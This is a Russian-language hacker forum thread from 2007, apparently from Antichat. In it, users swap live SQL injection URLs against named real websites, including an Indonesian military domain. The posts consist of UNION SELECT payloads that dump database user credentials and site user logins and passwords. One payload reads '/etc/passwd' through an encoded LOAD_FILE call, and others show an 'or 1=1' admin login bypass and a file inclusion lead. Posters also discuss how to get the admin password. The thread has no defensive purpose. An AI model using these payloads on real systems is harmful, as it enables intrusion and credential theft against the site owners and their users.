05.03.2007, 00:07
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
http://www.clan-peppers.ru/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
Надеюсь у кого нибудь получиться доломать до пасса админа =)
Я не знаю, как можно достучаться до пасса админа, не имея скуля. Сайт выдает ошибку при любом значении id..
http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5 ,6,7,8+from+mysql.user+limit+45/*
Мдя, ничего не понимаю. При запросе
Код:
http://www.keckobservatory.org/article.php?id=-99+union+select+111,2,3,4,5,6,7,8+from+mysql.user
Сайт выдает принтабельной колонку 1. (html код =>
printer_friendly_without.php?id=111)
При запросе
Код:
http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5,6,7,8+from+mysql.user
Проявляется printer_friendly_without.php?id=root
Но при запросах
Код:
http://www.keckobservatory.org/article.php?id=-99+union+select+user,2,3,4,5,6,7,8+from+mysql.user
и
Код:
http://www.keckobservatory.org/article.php?id=-99+union+select+password,2,3,4,5,6,7,8+from+mysql.user
printer_friendly_without.php?id= остается пустым
Последний раз редактировалось kamaz; 05.03.2007 в 00:21..
|
|
|
05.03.2007, 00:11
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Сообщение от kamaz
Я малость не понимаю, где ты взял инфу user:root. Колонка 1 вроде не принтабельна. А при запросах в колонку 2 сайт выдает ошибку.
aes...
|
|
|
|
05.03.2007, 01:38
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
http://www.x2studios.com/index.php?page=papers&id=-8+union+select+1,2,3,concat(user,char(58),password ),5,6,7,8+from+mysql.user
делать нехер =\
|
|
|
|
05.03.2007, 02:49
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
http://www.superski.ru/adm/show.php?news_id=-1056+union+select+1,2,3,4,5,6,7/*  |
|
|
|
05.03.2007, 13:28
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
sql inj
http://celica-toyota.info/index.php?p=gallerypic&img_id=-1+union+select+1,2,3,database(),6,7,8,9,10/*
local inc
http://celica-toyota.info/index.php?p=
|
|
|
|
05.03.2007, 15:18
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Код:
http://www.xfoto.ru/foto_alone.php?p_id=-99'+union+select+1,2,concat(login,0x3a,password),4+from+users/*
админка:
http://www.xfoto.ru/admin/
asd' or 1=1/* ... =\ |
|
|
|
05.03.2007, 16:59
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Код:
http://www.kontec.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
|
|
|
|
05.03.2007, 17:16
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
http://www.ledi.ru/news.php?id=-6+union+select+1,version(),3,4,5,6
=))
http://www.wsites.net.ru/index.php?id=-15+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15/*&page=13
|
|
|
|
06.03.2007, 00:09
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
http://www.tniad.mil.id/news.php?id=-377%20union%20select%201,2,table_name,4,5,6,7,8,9, 0,1,2,34%20from%20information_schema.tables/*
http://www.pythom.com/news.php?id=1193%20union%20select%201,2,3,4,5,6,7/*
))
|
|
|
|
06.03.2007, 00:21
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
kamaz
Код:
http://www.pythom.com/news.php?id=1193%20union%20select%201,user,password,4,5,6,7+from+mysql.user+limit+1,2/*
Код:
http://www.pythom.com/news.php?id=1193%20union%20select%201,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5,6,7+from+mysql.user/*
Код:
http://www.kladionicar.com/treba_znati.php?id=-1+union+select+1,2,3,4,concat(id,char(58),username,char(58),email),6+from+users/*
Пароли не нашёл 
Код:
http://privet.zp.ua/place.php3?id=-1+union+select+1/*
Код:
http://www.ajsquare.com/demo/forum_demo/topic_title.php?&head_id=20&td_id=-1%20union%20select%200,1,2,3,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),6,7,8,9,1,1,2,2,2%20from%20members/*&page=1
Последний раз редактировалось Goudini; 06.03.2007 в 00:39..
Причина: more sql-inj's
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
